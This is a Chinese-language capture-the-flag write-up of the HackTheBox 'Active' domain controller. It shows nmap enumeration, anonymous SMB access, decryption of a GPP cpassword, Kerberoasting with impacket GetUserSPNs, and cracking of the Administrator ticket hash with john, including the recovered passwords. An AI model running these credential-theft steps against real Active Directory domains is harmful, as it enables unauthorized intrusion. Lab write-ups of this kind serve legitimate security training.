基本信息

端口扫描

域服务器:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
$ nmap -sC -sV 10.10.10.100
Starting Nmap 7.91 ( https://nmap.org ) at 2020-11-11 13:36 CST
Nmap scan report for 10.10.10.100
Host is up (0.069s latency).
Not shown: 983 closed ports
PORT STATE SERVICE VERSION
53/tcp open domain Microsoft DNS 6.1.7601 (1DB15D39) (Windows Server 2008 R2 SP1)
| dns-nsid:
|_ bind.version: Microsoft DNS 6.1.7601 (1DB15D39)
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2020-11-11 05:36:48Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: active.htb, Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: active.htb, Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
49152/tcp open msrpc Microsoft Windows RPC
49153/tcp open msrpc Microsoft Windows RPC
49154/tcp open msrpc Microsoft Windows RPC
49155/tcp open msrpc Microsoft Windows RPC
49157/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49158/tcp open msrpc Microsoft Windows RPC
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows_server_2008:r2:sp1, cpe:/o:microsoft:windows

Host script results:
| smb2-security-mode:
| 2.02:
|_ Message signing enabled and required
| smb2-time:
| date: 2020-11-11T05:37:43
|_ start_date: 2020-11-11T05:12:05

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 73.72 seconds

SMB

smb可以匿名访问:

Replication

这个目录下有GPP的Groups.xml文件:

Groups.xml

1
2
3
<?xml version="1.0" encoding="utf-8"?>
<Groups clsid="{3125E937-EB16-4b4c-9934-544FC6D24D26}"><User clsid="{DF5F1855-51E5-4d24-8B1A-D9BDE98BA1D1}" name="active.htb\SVC_TGS" image="2" changed="2018-07-18 20:46:06" uid="{EF57DA28-5F69-4530-A59E-AAB58578219D}"><Properties action="U" newName="" fullName="" description="" cpassword="edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ" changeLogon="0" noChange="1" neverExpires="1" acctDisabled="0" userName="active.htb\SVC_TGS"/></User>
</Groups>

gpp-decrypt

直接用gpp-decrypt可以解出来密码:

1
2
3
4
➜  Groups gpp-decrypt edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ
GPPstillStandingStrong2k18

# username : active.htb\SVC_TGS

SVC_TGS SMB

然后使用这个账号继续枚举信息:

Users

Users就是C盘Users目录,user.txt在SVC_TGS用户桌面目录

user flag

Kerberoasting

关于Kerberoasting详细看三好学生博客:

GetUserSPNs

1
2
3
python3 ~/Tools/impacket/examples/GetUserSPNs.py -request -dc-ip 10.10.10.100 active.htb/SVC_TGS

$krb5tgs$23$*Administrator$ACTIVE.HTB$active.htb/Administrator*$f86e00a3c81a83de26d8b81b3098d6ce$a20055b41dc19de28da68af44f01611d7d52d535b687f82702db97427b72e35d3624093b13f2965210de29f7f83e9cdeb6a74dfb71a86846bfde4ad75e6cbcb0f137019f9d18afce89290f249e5059724aa278dea30dde16f8fe72c83f3abb0602acd8e123b2fb0c03bb6e184cc2f41b607153bed40e186a57f0f6a5726188f074cbb8da07ef73639058ae7f4fe83e4342df422526ff30886023c79de35250d1b8d48fa0441e059bd1e4adc3e38398fa94dad9ad56510ed34a0964a9427706b9d3f4bf905d92a7593fa86ceff56a5db21febdce3b7ae6755f8c0b81d4d868e8b94239c74135e1b7130b88883d819e9e05125251978ccd69bdfb2cef32c3a6f8ce966d35937c85c6ac92e0c9429bea32a63acd773db1b6b07fa8c08d014837181952eac1076cf0415eb5f3aa8d7849ed3d72521069286b3df5462960f71ad28c5a8b0870e9abf87f85015d0c27d531d4c192f03a2c74e22ca1daa5745cfdd362a2095f33068917e07977a290434a21fecfaf586760abeff4186fe81d5d45089523eccbbc11be4c8c4470b19a2c0ac897310c6aa49c13a26a42b418993708d15e6695dec7126cd8275caf7230834158e09a3d994e55a4fe67433806a10afb3b16632e6774f79fbbc813fb63d75cd4393cda2db5eb3a98ee7e0b8f53b35d03c9bdf9866e53c6d3d7f21060c4c889e4ae9fdcf434a695b87eaadf31f269871f21b97ad12ff2afb55e3bc3ea0f8dfaa1389a49b2d7d3eaa374a9a1bb55a549bdd788f96e96bf134e26095f7d88ad61767cbafbfa30e8ce45c744f4a02499e15f1daa58ce403a14065b66af1d0f7db9b877b460bad71da671919c8995ecdf0dc8107f151a840bbfb96b22ca86f99fa564c83ebddf353bc03f159ad6c5ef7dd872a1da7ac9f8145a27b05c83f569abc280e6cf426407b249ce50b7948653a9876b9702695c157ac8b15cc2ad96467beaba2c1bd5f4f7e705c713d1ba35d45edd11330828324d29bed91b8292d7dffe6a59209ce3aa32d2574dc78535365774dcebe6e62d424627dad4b9de6c0287acd4412285370d46ed914dfaa7c5d9127238a7aff521067838eba6f1b5c30dc1abdb121a28c6adfcc86bc8e4124b52489be32638287e2c946f29dda162e0781858be491b28787bde97150ca319dcefdf6be78bce7df56374d4d221720c48dd21d71a994aa1d16c011c36be5bf45bfdba5e7cb8d83535f30b54fccc7ffffee256affbb0f506c30e23aa24b066453313d

john

然后破解这个hash,得到Administrator账号密码:

1
2
3
sudo john --wordlist=/usr/share/wordlists/rockyou.txt hash.txt

Ticketmaster1968

system shell

然后使用这个密码即可得到system shell:

root flag

在Administrator用户桌面得到root.txt:

参考资料